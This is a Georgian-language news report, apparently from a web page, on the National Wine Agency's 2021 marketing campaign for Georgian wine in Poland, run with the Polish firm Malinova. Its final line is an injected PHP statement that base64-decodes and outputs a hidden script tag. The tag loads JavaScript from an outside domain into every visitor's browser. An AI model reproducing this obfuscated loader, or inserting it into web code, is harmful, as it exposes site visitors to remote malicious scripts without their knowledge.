celsiusi
ავერსი შნაიდერი
ქართული ღვინის ერთ-ერთ უმსხვილეს ექსპორტიორ ქვეყანაში, პოლონეთში, 2021 წელს  აქტიური მარკეტინგული კამპანია გაგრძელდება. ამის შესახებ ”ბიზნეს თაიმს” ღვინის ეროვნული სააგენტოდან აცნობეს. 
 
სააგენტოს განმარტებით,  პოლონეთი ქართული ღვინის ერთ-ერთი სტრატეგიული ბაზარია, სადაც ექსპორტი ყოველწლიურად მზარდია. გასულ წელს, პოლონეთში 5 მლნ-ზე მეტი ბოთლის ექსპორტი და 30%-იანი ზრდა დაფიქსირდა. 2020 წელს, პოლონეთმა 60 ექსპორტიორ ქვეყანას შორის მე-3 ადგილი დაიკავა.
 
პოლონეთში ქართული ღვინის მარკეტინგულ და სარეკლამო ღონისძიებებს კომპანია „მალინოვა” განახორციელებს. ღვინის ეროვნულ სააგენტოსა და პოლონურ მარკეტინგულ კომპანიას „Malinova spólka z ograniczoną odpowiedzialnością S.K“ შორის თანამშრომლობის შესახებ კონტრაქტს ხელი უკვე მოეწერა.  სააგენტო აღნიშნულ კომპანიასთან 2016 წლიდან თანამშრომლობს. 
 
2021 წელს, „მალინოვას“ ორგანიზებით, ქართული ღვინის დეგუსტაცია-სემინარები პოლონეთის სხვადასხვა ქალაქში ღვინის პროფესიონალებისა და ღვინით ვაჭრობის სფეროში დასაქმებული კომერციული პირებისთვის გაიმართება, ქართული ღვინოები წარდგენილი იქნება ადგილობრივ საერთაშორისო კონკურსებზე, მოეწყობა ღვინის ტურები საქართველოში, მომზადდება საპრომოციო დოკუმენტური ფილმი ქვევრის ღვინის დამზადების ტექნოლოგიაზე, ქართული ღვინის სარეკლამო კამპანია გაგრძელდება სხვადასხვა მედია პლატფორმაზე, გამოქვეყნდება სტატიები ქართული ღვინის კულტურის შესახებ.
 
ცნობისთვის, ქართული ღვინის სტრატეგიული ბაზრებია ასევე, აშშ, ჩინეთი, დიდი ბრიტანეთი, იაპონია, გერმანია და ბალტიისპირეთის ქვეყნები.
 
 
1314
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");